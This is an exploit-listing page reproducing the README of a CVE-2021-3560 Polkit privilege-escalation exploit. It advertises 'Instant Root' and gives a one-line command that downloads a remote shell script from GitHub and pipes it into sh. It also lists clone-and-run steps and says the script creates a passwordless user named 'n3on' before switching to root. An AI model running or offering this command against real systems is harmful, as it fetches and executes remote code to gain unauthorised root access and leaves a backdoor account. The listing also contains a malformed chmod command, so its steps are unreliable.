Sploitus

Exploit for Incorrect Authorization in Polkit Project Polkit

githubexploit · 2022-02-02

Exploit Code

README20 lines
## https://sploitus.com/exploit?id=A36243CA-7BAA-5CA7-82CB-A7C4B24456B6
# CVE-2021-3560
Polkit Instant Root Exploit

You can run one command to root with Polkit CVE-2021-3560 vulnerable boxes by typing in:

> sh -c "$(curl -sSL https://raw.githubusercontent.com/n3onhacks/CVE-2021-3560/main/polkit.sh)"

Or you can download the .sh or copy and paste it. Run and Instant Root. User created is named 'n3on' with no password, script then switches to root.

Usage:
>git clone https://github.com/n3onhacks/CVE-2021-3560.git
>chmod -R CVE-2021-3560
>cd CVE-2021-3560
>./polkit.sh

  *If you are not automatically root, type in 'sudo -s' to be root (See video).

POC Video:
https://www.youtube.com/watch?v=UWfuoeTeTtU